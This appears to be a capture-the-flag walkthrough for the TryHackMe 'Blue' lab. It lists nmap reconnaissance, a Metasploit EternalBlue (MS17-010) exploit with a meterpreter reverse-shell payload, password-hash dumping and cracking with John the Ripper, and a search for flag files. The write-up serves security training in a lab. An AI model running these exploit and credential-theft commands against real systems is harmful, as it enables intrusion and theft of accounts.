Blue

Room Link: https://tryhackme.com/room/blue

Walkthrough

Recon

nmap -A 10.10.68.22

The box is vulnerable to ms17-010

nmap -p135,139,445,3389 --script=vuln 10.10.68.22

Gain Access / Escalate

msfconsole 
search eternalblue 
use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/reverse_tcp 
set RHOSTS 10.10.68.22 
run

Cracking

hashdump
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Flags

Just ran this to find the locations of all the flags then grabbed them

cd C:\
dir "flag*" /s
PreviousContainer VulnerabilitiesNextSteel Mountain

Last updated